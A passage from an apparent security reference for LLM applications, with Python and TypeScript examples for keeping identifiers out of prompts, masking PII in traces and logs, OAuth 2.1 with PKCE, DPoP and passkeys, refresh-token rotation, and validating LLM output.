    "trace_id",     # String - observability
    "request_id",   # String - request tracking
    "workflow_run_id",  # UUID - workflow tracking

    # Secrets
    "api_key",      # String - never!
    "token",        # String - never!
}

2. Separate Context from Content

from dataclasses import dataclass
from uuid import UUID

@dataclass
class ContentPayload:
    """What the LLM sees - content only"""
    query: str
    context_texts: list[str]
    instructions: str

@dataclass
class ContextPayload:
    """What flows around the LLM - never in prompt"""
    user_id: UUID
    tenant_id: UUID
    analysis_id: UUID
    source_refs: list[UUID]
    trace_id: str

async def analyze_content(
    content: ContentPayload,
    context: ContextPayload,
) -> AnalysisResult:
    """
    Content goes TO the LLM.
    Context goes AROUND the LLM.
    """
    # Build prompt from content only
    prompt = build_prompt(
        query=content.query,
        context_texts=content.context_texts,
        instructions=content.instructions,
        # NO context payload fields here!
    )

    # LLM sees content only
    llm_output = await llm.generate(prompt)

    # Reattach context to output
    return AnalysisResult(
        content=llm_output,
        user_id=context.user_id,      # From context
        tenant_id=context.tenant_id,   # From context
        analysis_id=context.analysis_id,  # From context
        sources=context.source_refs,   # From context
    )

3. Audit Prompts Before Sending

import re

UUID_PATTERN = r'[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}'

def audit_prompt(prompt: str) -> list[str]:
    """
    Check for forbidden patterns before sending to LLM.
    Raises if any IDs detected.
    """
    violations = []

    # Check for UUIDs
    if re.search(UUID_PATTERN, prompt, re.IGNORECASE):
        violations.append("UUID detected in prompt")

    # Check for ID field names
    for forbidden in FORBIDDEN_IN_PROMPTS:
        pattern = rf'\b{forbidden}\b'
        if re.search(pattern, prompt, re.IGNORECASE):
            violations.append(f"Forbidden field '{forbidden}' in prompt")

    return violations

# Usage in prompt building
def build_safe_prompt(content: ContentPayload) -> str:
    prompt = f"""
    Analyze the following content:

    {content.query}

    Context:
    {chr(10).join(content.context_texts)}
    """

    # Audit before returning; PromptSecurityError is an app-specific exception
    violations = audit_prompt(prompt)
    if violations:
        raise PromptSecurityError(
            f"Prompt contains forbidden content: {violations}"
        )

    return prompt

OrchestKit Integration Points

Content Analysis Workflow

# backend/app/workflows/agents/content_analyzer.py

async def analyze(state: AnalysisState) -> AnalysisState:
    # Context is in state, but NOT passed to prompt
    ctx = state.request_context

    # Build content-only payload
    content = ContentPayload(
        query=state.analysis_request.query,
        context_texts=[doc.content for doc in state.retrieved_docs],
        instructions=get_analysis_instructions(),
    )

    # Context payload for attribution
    context = ContextPayload(
        user_id=ctx.user_id,
        tenant_id=ctx.tenant_id,
        analysis_id=state.analysis_id,
        source_refs=[doc.id for doc in state.retrieved_docs],
        trace_id=ctx.trace_id,
    )

    result = await analyze_content(content, context)
    return state.with_result(result)

Common Mistakes

# ❌ BAD: ID in prompt
prompt = f"Analyze document {doc_id} for user {user_id}"

# ❌ BAD: ID in f-string
prompt = f"Context from analysis {analysis_id}:\n{context}"

# ❌ BAD: ID in instruction
prompt = f"You are analyzing for tenant {tenant_id}. Be helpful."

# ✅ GOOD: Content only
prompt = f"Analyze the following document:\n{document_content}"

# ✅ GOOD: No IDs visible
prompt = f"""
Analyze this content and provide insights:

{content}

Relevant context:
{context_texts}
"""

Testing Context Separation

import pytest

class TestContextSeparation:

    def test_prompt_contains_no_uuids(self):
        content = ContentPayload(
            query="What are the key concepts?",
            context_texts=["Machine learning basics..."],
            instructions="Provide clear analysis",
        )

        prompt = build_safe_prompt(content)

        assert not re.search(UUID_PATTERN, prompt)

    def test_prompt_contains_no_forbidden_fields(self):
        content = ContentPayload(...)
        prompt = build_safe_prompt(content)

        for forbidden in FORBIDDEN_IN_PROMPTS:
            assert forbidden not in prompt.lower()

    def test_audit_catches_leaked_uuid(self):
        bad_prompt = "Analyze doc 123e4567-e89b-12d3-a456-426614174000"

        violations = audit_prompt(bad_prompt)

        assert len(violations) > 0
        assert "UUID" in violations[0]

Langfuse Mask Callback

Pre-trace PII masking using Langfuse's mask callback for automatic redaction before data reaches the server.

Basic Setup

from langfuse import Langfuse
import re

PII_PATTERNS = {
    "email": re.compile(r'\b[\w.-]+@[\w.-]+\.\w{2,}\b'),
    "phone": re.compile(r'\b(?:\+1[-.]?)?\(?\d{3}\)?[-.]?\d{3}[-.]?\d{4}\b'),
    "ssn": re.compile(r'\b\d{3}-\d{2}-\d{4}\b'),
}

def mask_pii(data: dict) -> dict:
    """Mask PII in Langfuse trace data before sending."""
    def redact_string(value: str) -> str:
        for entity_type, pattern in PII_PATTERNS.items():
            value = pattern.sub(f'[REDACTED_{entity_type.upper()}]', value)
        return value

    def redact_recursive(obj):
        if isinstance(obj, str):
            return redact_string(obj)
        elif isinstance(obj, dict):
            return {k: redact_recursive(v) for k, v in obj.items()}
        elif isinstance(obj, list):
            return [redact_recursive(item) for item in obj]
        return obj

    return redact_recursive(data)

langfuse = Langfuse(mask=mask_pii)

With Presidio

from presidio_analyzer import AnalyzerEngine
from presidio_anonymizer import AnonymizerEngine

analyzer = AnalyzerEngine()
anonymizer = AnonymizerEngine()

def presidio_mask(data: dict) -> dict:
    """Enterprise-grade PII masking with Presidio."""
    def anonymize_string(value: str) -> str:
        if len(value) < 5:
            return value
        results = analyzer.analyze(text=value, language="en")
        if results:
            return anonymizer.anonymize(text=value, analyzer_results=results).text
        return value

    def process_recursive(obj):
        if isinstance(obj, str):
            return anonymize_string(obj)
        elif isinstance(obj, dict):
            return {k: process_recursive(v) for k, v in obj.items()}
        elif isinstance(obj, list):
            return [process_recursive(item) for item in obj]
        return obj

    return process_recursive(data)

langfuse = Langfuse(mask=presidio_mask)

LLM Guard Sanitization

Input/output sanitization for LLM pipelines using LLM Guard's Anonymize and Deanonymize scanners.

Installation

pip install llm-guard
python -m spacy download en_core_web_trf  # High-accuracy model

Basic Input Sanitization

from llm_guard.input_scanners import Anonymize
from llm_guard.input_scanners.anonymize_helpers import BERT_LARGE_NER_CONF
from llm_guard.vault import Vault

# Vault stores original values for deanonymization
vault = Vault()

# Initialize scanner with configuration
scanner = Anonymize(
    vault=vault,
    preamble="",  # Text prepended to sanitized output
    allowed_names=["John Doe"],  # Names to NOT anonymize
    hidden_names=["Acme Corp"],  # Always anonymize these
    recognizer_conf=BERT_LARGE_NER_CONF,
    language="en"
)

def sanitize_input(prompt: str) -> tuple[str, bool, float]:
    """
    Sanitize user input before sending to LLM.

    Returns:
        (sanitized_prompt, is_valid, risk_score)
    """
    sanitized_prompt, is_valid, risk_score = scanner.scan(prompt)
    return sanitized_prompt, is_valid, risk_score

# Usage
prompt = "My name is Jane Smith and my email is jane@company.com"
sanitized, valid, risk = sanitize_input(prompt)
# Result: "My name is [REDACTED_PERSON_1] and my email is [REDACTED_EMAIL_1]"

Output Deanonymization

from llm_guard.output_scanners import Deanonymize

# Use the same vault from input sanitization
deanonymize_scanner = Deanonymize(vault=vault)

def deanonymize_output(sanitized_prompt: str, model_output: str) -> str:
    """
    Restore original values in model output.

    Args:
        sanitized_prompt: The prompt that was sent to the LLM
        model_output: The LLM's response

    Returns:
        Output with original values restored
    """
    restored_output, is_valid, risk_score = deanonymize_scanner.scan(
        sanitized_prompt,
        model_output
    )
    return restored_output

# Example flow
original_prompt = "Schedule a meeting with Jane Smith at jane@company.com"
sanitized_prompt, _, _ = scanner.scan(original_prompt)
# sanitized_prompt = "Schedule a meeting with [PERSON_1] at [EMAIL_1]"

llm_response = await llm.generate(sanitized_prompt)
# llm_response = "Meeting scheduled with [PERSON_1]. Confirmation sent to [EMAIL_1]."

final_response = deanonymize_output(sanitized_prompt, llm_response)
# final_response = "Meeting scheduled with Jane Smith. Confirmation sent to jane@company.com."

Output Sensitive Data Detection

from llm_guard.output_scanners import Sensitive

# Detect PII in LLM outputs (without prior anonymization)
sensitive_scanner = Sensitive(
    entity_types=["PERSON", "EMAIL_ADDRESS", "PHONE_NUMBER", "CREDIT_CARD"],
    redact=True,  # Replace detected PII with [REDACTED]
    threshold=0.5  # Confidence threshold (0-1)
)

def check_output_for_pii(prompt: str, output: str) -> tuple[str, bool, float]:
    """
    Check LLM output for leaked PII.

    Returns:
        (sanitized_output, is_valid, risk_score)
    """
    sanitized_output, is_valid, risk_score = sensitive_scanner.scan(prompt, output)
    return sanitized_output, is_valid, risk_score

Full Pipeline Integration

from llm_guard.input_scanners import Anonymize
from llm_guard.output_scanners import Deanonymize, Sensitive
from llm_guard.vault import Vault
from langfuse import observe, get_client

class SecureLLMPipeline:
    def __init__(self, llm):
        self.llm = llm  # any client exposing an async generate() method
        self.vault = Vault()
        self.anonymize = Anonymize(vault=self.vault, language="en")
        self.deanonymize = Deanonymize(vault=self.vault)
        self.sensitive_check = Sensitive(redact=True)

    @observe(name="secure_llm_call")
    async def process(self, user_input: str) -> str:
        """Secure LLM pipeline with full PII protection."""

        # Step 1: Anonymize input
        sanitized_input, input_valid, input_risk = self.anonymize.scan(user_input)

        get_client().update_current_observation(
            metadata={
                "input_risk_score": input_risk,
                "pii_detected_in_input": not input_valid
            }
        )

        # Step 2: Call LLM with sanitized input
        llm_response = await self.llm.generate(sanitized_input)

        # Step 3: Check output for leaked PII
        checked_output, output_valid, output_risk = self.sensitive_check.scan(
            sanitized_input,
            llm_response
        )

        # Step 4: Deanonymize for user (restore original names)
        final_output = self.deanonymize.scan(sanitized_input, checked_output)[0]

        get_client().update_current_observation(
            metadata={
                "output_risk_score": output_risk,
                "pii_leaked_in_output": not output_valid
            }
        )

        return final_output

Configuration Options

Anonymize Scanner

from llm_guard.input_scanners import Anonymize
from llm_guard.input_scanners.anonymize_helpers import (
    BERT_LARGE_NER_CONF,
    BERT_BASE_NER_CONF,
    DISTILBERT_NER_CONF
)

scanner = Anonymize(
    vault=vault,
    preamble="",                          # Prepend to output
    allowed_names=["Claude", "GPT"],      # Don't anonymize these
    hidden_names=["Internal Corp"],       # Always anonymize these
    entity_types=[                        # Entities to detect
        "PERSON",
        "EMAIL_ADDRESS",
        "PHONE_NUMBER",
        "CREDIT_CARD",
        "US_SSN",
        "IP_ADDRESS",
        "LOCATION"
    ],
    use_faker=True,                       # Replace with fake data
    recognizer_conf=BERT_LARGE_NER_CONF,  # NER model config
    threshold=0.5,                        # Confidence threshold
    language="en"                         # Language
)

Recognizer Configurations

| Config | Model | Speed | Accuracy |
|---|---|---|---|
| BERT_LARGE_NER_CONF | bert-large | Slow | Highest |
| BERT_BASE_NER_CONF | bert-base | Medium | High |
| DISTILBERT_NER_CONF | distilbert | Fast | Good |

Handling Overlapping Entities

LLM Guard handles overlapping entities automatically:

# Input: "Contact John Smith at john.smith@example.com"
# PERSON: "John Smith" (indices 8-18)
# EMAIL: "john.smith@example.com" (indices 22-45)
# - john.smith overlaps with PERSON

# LLM Guard prioritizes:
# 1. Higher confidence score wins
# 2. Longer span wins if scores equal

Testing

import pytest
from llm_guard.input_scanners import Anonymize
from llm_guard.output_scanners import Deanonymize
from llm_guard.vault import Vault

def test_anonymization():
    vault = Vault()
    scanner = Anonymize(vault=vault)

    test_input = "Contact John at john@example.com or 555-123-4567"
    sanitized, is_valid, risk = scanner.scan(test_input)

    # Verify PII is removed
    assert "John" not in sanitized
    assert "john@example.com" not in sanitized
    assert "555-123-4567" not in sanitized

    # Verify placeholders are present
    assert "[PERSON" in sanitized or "REDACTED" in sanitized

def test_deanonymization():
    vault = Vault()
    anonymize = Anonymize(vault=vault)
    deanonymize = Deanonymize(vault=vault)

    original = "Send email to Alice"
    sanitized, _, _ = anonymize.scan(original)

    # Simulate LLM response
    response = f"Email sent to {sanitized.split()[-1]}"

    restored, _, _ = deanonymize.scan(sanitized, response)
    assert "Alice" in restored

Logging Redaction Patterns

Pre-logging PII redaction with structlog and loguru.

Structlog Processor

import re
import structlog
from typing import Any

# Pre-compile patterns
PII_PATTERNS = {
    "email": re.compile(r'\b[\w.-]+@[\w.-]+\.\w{2,}\b'),
    "phone": re.compile(r'\b(?:\+1[-.]?)?\(?\d{3}\)?[-.]?\d{3}[-.]?\d{4}\b'),
    "ssn": re.compile(r'\b\d{3}-\d{2}-\d{4}\b'),
    "credit_card": re.compile(r'\b(?:\d[ -]*?){13,19}\b'),
    "ip": re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b'),
}

def redact_pii(logger, method_name: str, event_dict: dict) -> dict:
    """
    Structlog processor to redact PII from all log fields.
    """
    def redact_value(value: Any) -> Any:
        if isinstance(value, str):
            result = value
            for entity_type, pattern in PII_PATTERNS.items():
                result = pattern.sub(f'[REDACTED_{entity_type.upper()}]', result)
            return result
        elif isinstance(value, dict):
            return {k: redact_value(v) for k, v in value.items()}
        elif isinstance(value, list):
            return [redact_value(item) for item in value]
        return value

    return {k: redact_value(v) for k, v in event_dict.items()}


# Configure structlog with PII redaction
structlog.configure(
    processors=[
        structlog.contextvars.merge_contextvars,
        structlog.processors.add_log_level,
        structlog.processors.TimeStamper(fmt="iso"),
        redact_pii,  # Add PII redaction processor
        structlog.processors.JSONRenderer()
    ]
)

logger = structlog.get_logger()

# Usage - PII is automatically redacted
logger.info(
    "user_registered",
    email="john@example.com",  # -> [REDACTED_EMAIL]
    phone="555-123-4567"       # -> [REDACTED_PHONE]
)

Structlog with Presidio

import structlog
from presidio_analyzer import AnalyzerEngine
from presidio_anonymizer import AnonymizerEngine

# Singleton Presidio engines
_analyzer = None
_anonymizer = None

def get_presidio_engines():
    global _analyzer, _anonymizer
    if _analyzer is None:
        _analyzer = AnalyzerEngine()
        _anonymizer = AnonymizerEngine()
    return _analyzer, _anonymizer

def presidio_redact_processor(logger, method_name: str, event_dict: dict) -> dict:
    """Use Presidio for enterprise-grade PII redaction in logs."""
    analyzer, anonymizer = get_presidio_engines()

    def redact_value(value):
        if isinstance(value, str) and len(value) > 5:
            try:
                results = analyzer.analyze(text=value, language="en")
                if results:
                    anonymized = anonymizer.anonymize(
                        text=value,
                        analyzer_results=results
                    )
                    return anonymized.text
            except Exception:
                pass  # Fallback to original on error
        elif isinstance(value, dict):
            return {k: redact_value(v) for k, v in value.items()}
        elif isinstance(value, list):
            return [redact_value(item) for item in value]
        return value

    return {k: redact_value(v) for k, v in event_dict.items()}

structlog.configure(
    processors=[
        structlog.processors.add_log_level,
        structlog.processors.TimeStamper(fmt="iso"),
        presidio_redact_processor,
        structlog.processors.JSONRenderer()
    ]
)

Loguru Filter

import re
from loguru import logger

PII_PATTERNS = {
    "email": re.compile(r'\b[\w.-]+@[\w.-]+\.\w{2,}\b'),
    "phone": re.compile(r'\b(?:\+1[-.]?)?\(?\d{3}\)?[-.]?\d{3}[-.]?\d{4}\b'),
    "ssn": re.compile(r'\b\d{3}-\d{2}-\d{4}\b'),
    "credit_card": re.compile(r'\b(?:\d[ -]*?){13,19}\b'),
    "ip": re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b'),  # needed for the IP example below
}

def pii_filter(record):
    """Loguru filter to redact PII from log messages."""
    message = record["message"]
    for entity_type, pattern in PII_PATTERNS.items():
        message = pattern.sub(f'[REDACTED_{entity_type.upper()}]', message)
    record["message"] = message
    return True

# Configure loguru with PII filter
logger.remove()  # Remove default handler
logger.add(
    "logs/app.log",
    filter=pii_filter,
    format="{time:YYYY-MM-DD HH:mm:ss} | {level} | {message}",
    serialize=True  # JSON format
)

# Usage
logger.info("User john@example.com logged in from 192.168.1.1")
# Output: "User [REDACTED_EMAIL] logged in from [REDACTED_IP]"

Loguru with Custom Patcher

from loguru import logger

def pii_patcher(record):
    """Patch record to redact PII in extra fields."""
    if "extra" in record:
        for key, value in record["extra"].items():
            if isinstance(value, str):
                for entity_type, pattern in PII_PATTERNS.items():
                    value = pattern.sub(f'[REDACTED_{entity_type.upper()}]', value)
                record["extra"][key] = value
    return record

logger = logger.patch(pii_patcher)

# Usage with bound variables
logger.bind(user_email="jane@example.com").info("Processing user request")
# The email in extra will be redacted

Field-Specific Redaction

import structlog
from typing import Any

# Fields that should always be redacted
SENSITIVE_FIELDS = {
    "email", "phone", "ssn", "credit_card", "password",
    "api_key", "token", "secret", "authorization"
}

# Fields that should be partially masked
PARTIAL_MASK_FIELDS = {
    "user_id": lambda v: f"{str(v)[:4]}...{str(v)[-4:]}" if len(str(v)) > 8 else "***"
}

def smart_redact_processor(logger, method_name: str, event_dict: dict) -> dict:
    """Smart redaction based on field names."""
    result = {}

    for key, value in event_dict.items():
        key_lower = key.lower()

        # Full redaction for sensitive fields
        if key_lower in SENSITIVE_FIELDS:
            result[key] = "[REDACTED]"

        # Partial masking
        elif key_lower in PARTIAL_MASK_FIELDS:
            result[key] = PARTIAL_MASK_FIELDS[key_lower](value)

        # Pattern-based redaction for other string fields
        elif isinstance(value, str):
            result[key] = redact_pii_patterns(value)

        else:
            result[key] = value

    return result

def redact_pii_patterns(value: str) -> str:
    """Apply PII patterns to a string."""
    for entity_type, pattern in PII_PATTERNS.items():
        value = pattern.sub(f'[REDACTED_{entity_type.upper()}]', value)
    return value
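
A minimal wiring sketch for the field-based redactor, assuming smart_redact_processor and the pattern helpers above are in scope:

# Hook the smart redactor into the structlog pipeline
structlog.configure(
    processors=[
        structlog.processors.add_log_level,
        structlog.processors.TimeStamper(fmt="iso"),
        smart_redact_processor,
        structlog.processors.JSONRenderer()
    ]
)

logger = structlog.get_logger()
logger.info("login_attempt", password="hunter2", user_id="1234567890ab")
# -> password="[REDACTED]", user_id="1234...90ab"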

Context Manager for Sensitive Operations

import structlog
from contextlib import contextmanager

@contextmanager
def sensitive_logging_context():
    """
    Context manager that increases redaction sensitivity.
    """
    # Bind a flag to indicate we're in a sensitive context
    structlog.contextvars.bind_contextvars(
        _sensitive_context=True
    )
    try:
        yield
    finally:
        structlog.contextvars.unbind_contextvars("_sensitive_context")

def enhanced_redact_processor(logger, method_name: str, event_dict: dict) -> dict:
    """Enhanced redaction in sensitive contexts."""
    is_sensitive = event_dict.pop("_sensitive_context", False)

    if is_sensitive:
        # In sensitive context, redact everything that looks like data
        for key, value in event_dict.items():
            if isinstance(value, str) and len(value) > 3:
                event_dict[key] = "[REDACTED_SENSITIVE]"
    else:
        # Normal PII redaction
        event_dict = redact_pii(logger, method_name, event_dict)

    return event_dict

# Usage (the processor pipeline must include merge_contextvars so the
# _sensitive_context flag reaches enhanced_redact_processor)
logger = structlog.get_logger()

with sensitive_logging_context():
    logger.info("processing_payment", card="4111111111111111")
    # Everything is redacted in this context

Testing Log Redaction

import pytest
import structlog
from io import StringIO

def test_pii_redaction_in_logs():
    """Verify PII is redacted from logs."""
    output = StringIO()

    structlog.configure(
        processors=[
            redact_pii,
            structlog.processors.JSONRenderer()
        ],
        logger_factory=structlog.WriteLoggerFactory(file=output)
    )

    logger = structlog.get_logger()
    logger.info("test", email="test@example.com", ssn="123-45-6789")

    log_output = output.getvalue()

    assert "test@example.com" not in log_output
    assert "123-45-6789" not in log_output
    assert "[REDACTED_EMAIL]" in log_output
    assert "[REDACTED_SSN]" in log_output

OAuth 2.1 & Passkeys Reference

OAuth 2.1 Overview

OAuth 2.1 consolidates OAuth 2.0 best practices and security requirements:

Key Changes from OAuth 2.0

  • PKCE required for ALL clients (not just public)
  • Implicit grant removed (security vulnerability)
  • Password grant removed (credential anti-pattern)
  • Bearer tokens must use TLS
  • Refresh token rotation mandatory

PKCE Flow (Required)

import hashlib
import base64
import secrets

def generate_pkce_pair():
    """Generate code_verifier and code_challenge for PKCE."""
    # Generate random code_verifier (43-128 chars)
    code_verifier = secrets.token_urlsafe(64)
    
    # Create code_challenge using S256
    digest = hashlib.sha256(code_verifier.encode()).digest()
    code_challenge = base64.urlsafe_b64encode(digest).rstrip(b'=').decode()
    
    return code_verifier, code_challenge

import requests
from urllib.parse import urlencode

# Usage
verifier, challenge = generate_pkce_pair()

# Step 1: Authorization request (params must be URL-encoded, not interpolated raw)
auth_url = "https://auth.example.com/authorize?" + urlencode({
    "response_type": "code",
    "client_id": client_id,
    "redirect_uri": redirect_uri,
    "code_challenge": challenge,
    "code_challenge_method": "S256",
    "state": state,
    "scope": "openid profile",
})

# Step 2: Exchange code for tokens
token_response = requests.post(
    "https://auth.example.com/token",
    data={
        "grant_type": "authorization_code",
        "code": auth_code,
        "redirect_uri": redirect_uri,
        "client_id": client_id,
        "code_verifier": verifier,  # PKCE verification
    }
)
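
On the server side, the token endpoint recomputes the S256 challenge from the presented code_verifier and compares it to the challenge stored with the authorization code. A minimal sketch (how the original challenge was stored is an assumption):

import base64
import hashlib
import hmac

def verify_pkce(code_verifier: str, stored_challenge: str) -> bool:
    """Recompute the S256 challenge from the verifier and compare."""
    digest = hashlib.sha256(code_verifier.encode()).digest()
    computed = base64.urlsafe_b64encode(digest).rstrip(b'=').decode()
    # Constant-time comparison avoids timing side channels
    return hmac.compare_digest(computed, stored_challenge)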

Token Lifetimes (2026 Recommendations)

Token Type    | Lifetime        | Storage
Access Token  | 15 min - 1 hour | Memory only
Refresh Token | 7-30 days       | HTTPOnly cookie / secure storage
ID Token      | Same as access  | Memory only

DPoP (Demonstrating Proof of Possession)

Binds tokens to client cryptographic keys:

import json
import time
import uuid

import jwt
import requests

def create_dpop_proof(http_method: str, http_uri: str, private_key) -> str:
    """Create DPoP proof JWT for a request (RFC 9449)."""
    claims = {
        "jti": str(uuid.uuid4()),  # unique per proof (replay protection)
        "htm": http_method,
        "htu": http_uri,
        "iat": int(time.time()),
    }

    headers = {
        "typ": "dpop+jwt",
        "alg": "ES256",
        # The jwk header must be a JWK dict; PyJWT's to_jwk returns a JSON string
        "jwk": json.loads(jwt.algorithms.ECAlgorithm.to_jwk(private_key.public_key())),
    }

    return jwt.encode(claims, private_key, algorithm="ES256", headers=headers)

# Usage
dpop_proof = create_dpop_proof("POST", "https://api.example.com/token", private_key)

response = requests.post(
    "https://api.example.com/token",
    headers={"DPoP": dpop_proof},
    data={"grant_type": "refresh_token", "refresh_token": rt},
)

Passkeys / WebAuthn

Overview

Passkeys replace passwords with cryptographic credentials:

  • Phishing-resistant: Bound to origin
  • Passwordless: No secrets to remember
  • Multi-device: Synced via platform
  • Biometric: Face ID, Touch ID, fingerprint

Registration Flow

from webauthn import (
    generate_registration_options,
    verify_registration_response,
)
from webauthn.helpers.structs import (
    AuthenticatorSelectionCriteria,
    ResidentKeyRequirement,
    UserVerificationRequirement,
)

# Step 1: Generate registration options
options = generate_registration_options(
    rp_id="example.com",
    rp_name="Example App",
    user_id=user.id.encode(),
    user_name=user.email,
    user_display_name=user.name,
    authenticator_selection=AuthenticatorSelectionCriteria(
        resident_key=ResidentKeyRequirement.REQUIRED,
        user_verification=UserVerificationRequirement.REQUIRED,
    ),
)

# Send options to client
return jsonify(options)

# Step 2: Verify registration response
verification = verify_registration_response(
    credential=client_response,
    expected_challenge=stored_challenge,
    expected_rp_id="example.com",
    expected_origin="https://example.com",
)

# Store credential
db.save_credential(
    user_id=user.id,
    credential_id=verification.credential_id,
    public_key=verification.credential_public_key,
    sign_count=verification.sign_count,
)

Authentication Flow

from webauthn import (
    generate_authentication_options,
    verify_authentication_response,
)
from webauthn.helpers.structs import PublicKeyCredentialDescriptor

# Step 1: Generate authentication options
options = generate_authentication_options(
    rp_id="example.com",
    allow_credentials=[
        PublicKeyCredentialDescriptor(id=cred.credential_id)
        for cred in user.credentials
    ],
)

# Step 2: Verify authentication response
verification = verify_authentication_response(
    credential=client_response,
    expected_challenge=stored_challenge,
    expected_rp_id="example.com",
    expected_origin="https://example.com",
    credential_public_key=stored_credential.public_key,
    credential_current_sign_count=stored_credential.sign_count,
)

# Update sign count (replay protection)
stored_credential.sign_count = verification.new_sign_count
db.save(stored_credential)

# Issue session/tokens
return create_session(user)

Frontend Implementation

// Registration
async function registerPasskey(options: PublicKeyCredentialCreationOptions) {
  const credential = await navigator.credentials.create({
    publicKey: options,
  });

  // Send credential to server
  // (in production, base64url-encode the ArrayBuffer fields such as rawId
  // and response.attestationObject before JSON serialization)
  await fetch('/api/auth/passkey/register', {
    method: 'POST',
    body: JSON.stringify(credential),
  });
}

// Authentication
async function authenticateWithPasskey(options: PublicKeyCredentialRequestOptions) {
  const credential = await navigator.credentials.get({
    publicKey: options,
  });
  
  // Send credential to server
  const response = await fetch('/api/auth/passkey/authenticate', {
    method: 'POST',
    body: JSON.stringify(credential),
  });
  
  return response.json();
}

// Conditional UI (autofill)
if (window.PublicKeyCredential?.isConditionalMediationAvailable) {
  const available = await PublicKeyCredential.isConditionalMediationAvailable();
  if (available) {
    // Show passkey autofill in username field
    const credential = await navigator.credentials.get({
      publicKey: options,
      mediation: 'conditional',
    });
  }
}

Refresh Token Rotation

import secrets
import hashlib
from datetime import datetime, timedelta, timezone

def rotate_refresh_token(old_token: str, db) -> tuple[str, str]:
    """Rotate refresh token on use (security best practice)."""
    old_hash = hashlib.sha256(old_token.encode()).hexdigest()
    
    # Find and validate old token
    token_record = db.query("""
        SELECT user_id, version FROM refresh_tokens
        WHERE token_hash = ? AND expires_at > NOW() AND revoked = FALSE
    """, [old_hash]).fetchone()
    
    if not token_record:
        raise InvalidTokenError("Refresh token invalid or expired")
    
    user_id, version = token_record
    
    # Revoke old token
    db.execute(
        "UPDATE refresh_tokens SET revoked = TRUE WHERE token_hash = ?",
        [old_hash]
    )
    
    # Create new tokens
    new_access_token = create_access_token(user_id)
    
    new_refresh_token = secrets.token_urlsafe(32)
    new_hash = hashlib.sha256(new_refresh_token.encode()).hexdigest()
    
    db.execute("""
        INSERT INTO refresh_tokens (user_id, token_hash, expires_at, version)
        VALUES (?, ?, ?, ?)
    """, [user_id, new_hash, datetime.now(timezone.utc) + timedelta(days=7), version + 1])
    
    return new_access_token, new_refresh_token
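
Rotation also enables reuse detection: if a previously revoked token is presented again, it was likely stolen, and every token for that user should be revoked. A sketch under the same schema assumptions as the rotation code above:

def detect_refresh_token_reuse(old_token: str, db) -> None:
    """Presenting an already-revoked token signals theft; revoke the family."""
    old_hash = hashlib.sha256(old_token.encode()).hexdigest()

    row = db.query(
        "SELECT user_id, revoked FROM refresh_tokens WHERE token_hash = ?",
        [old_hash],
    ).fetchone()

    if row and row[1]:  # token exists but was already rotated out
        db.execute(
            "UPDATE refresh_tokens SET revoked = TRUE WHERE user_id = ?",
            [row[0]],
        )
        raise InvalidTokenError("Refresh token reuse detected; all sessions revoked")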

Output Guardrails

Purpose

After LLM returns, validate the output before using it:

┌────────────────────────────────────────────────────────────┐
│                  OUTPUT VALIDATION                         │
├────────────────────────────────────────────────────────────┤
│                                                            │
│  LLM Response ──► Guardrails ──► Validated Output          │
│                       │                                    │
│                       ▼                                    │
│              ┌────────────────┐                            │
│              │   VALIDATORS   │                            │
│              ├────────────────┤                            │
│              │ □ Schema       │  Does it match expected?   │
│              │ □ No IDs       │  No hallucinated UUIDs?    │
│              │ □ Grounded     │  Supported by context?     │
│              │ □ Safe         │  No toxic content?         │
│              │ □ Size         │  Within limits?            │
│              └────────────────┘                            │
│                       │                                    │
│           ┌──────────┴──────────┐                         │
│           ▼                     ▼                         │
│    ┌──────────┐          ┌──────────┐                     │
│    │   PASS   │          │   FAIL   │                     │
│    │          │          │          │                     │
│    │ Continue │          │ Retry or │                     │
│    │          │          │ Error    │                     │
│    └──────────┘          └──────────┘                     │
│                                                            │
└────────────────────────────────────────────────────────────┘

Implementation

1. Validation Result Type

from dataclasses import dataclass
from enum import Enum

class ValidationStatus(Enum):
    PASSED = "passed"
    FAILED = "failed"
    WARNING = "warning"

@dataclass
class ValidationResult:
    status: ValidationStatus
    reason: str | None = None
    details: dict | None = None

    @property
    def is_valid(self) -> bool:
        return self.status in (ValidationStatus.PASSED, ValidationStatus.WARNING)

2. Schema Validation

from pydantic import BaseModel, ValidationError
from typing import TypeVar

T = TypeVar("T", bound=BaseModel)

def validate_schema(
    llm_output: dict,
    schema: type[T],
) -> tuple[T | None, ValidationResult]:
    """
    Validate LLM output matches expected schema.
    """
    try:
        parsed = schema.model_validate(llm_output)
        return parsed, ValidationResult(
            status=ValidationStatus.PASSED,
        )
    except ValidationError as e:
        return None, ValidationResult(
            status=ValidationStatus.FAILED,
            reason=f"Schema validation failed: {e.error_count()} errors",
            details={"errors": e.errors()},
        )

# Usage
class AnalysisOutput(BaseModel):
    summary: str
    key_concepts: list[str]
    difficulty: str

parsed, result = validate_schema(llm_response, AnalysisOutput)
if not result.is_valid:
    raise GuardrailError(result.reason)  # domain error; don't re-raise pydantic's ValidationError

3. No Hallucinated IDs

import re

UUID_PATTERN = r'[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}'

def validate_no_ids(output: str) -> ValidationResult:
    """
    Ensure LLM didn't hallucinate any identifiers.
    """
    # Check for UUIDs
    uuids = re.findall(UUID_PATTERN, output, re.IGNORECASE)
    if uuids:
        return ValidationResult(
            status=ValidationStatus.FAILED,
            reason=f"Found {len(uuids)} hallucinated UUIDs",
            details={"uuids": uuids},
        )

    # Check for ID-like patterns
    id_patterns = [
        r'user_id[:\s]+\S+',
        r'doc_id[:\s]+\S+',
        r'id[:\s]+[a-f0-9]{8,}',
    ]

    for pattern in id_patterns:
        matches = re.findall(pattern, output, re.IGNORECASE)
        if matches:
            return ValidationResult(
                status=ValidationStatus.WARNING,
                reason=f"Found ID-like pattern: {matches[0]}",
                details={"matches": matches},
            )

    return ValidationResult(status=ValidationStatus.PASSED)

4. Grounding Validation

def validate_grounding(
    output: str,
    context_texts: list[str],
    threshold: float = 0.3,
) -> ValidationResult:
    """
    Check if LLM output is grounded in provided context.
    Uses simple keyword overlap for speed.
    """
    # Extract key terms from output
    output_terms = set(extract_key_terms(output))

    # Extract key terms from context
    context_terms = set()
    for text in context_texts:
        context_terms.update(extract_key_terms(text))

    # Calculate overlap
    if not output_terms:
        return ValidationResult(
            status=ValidationStatus.WARNING,
            reason="No key terms in output",
        )

    overlap = len(output_terms & context_terms) / len(output_terms)

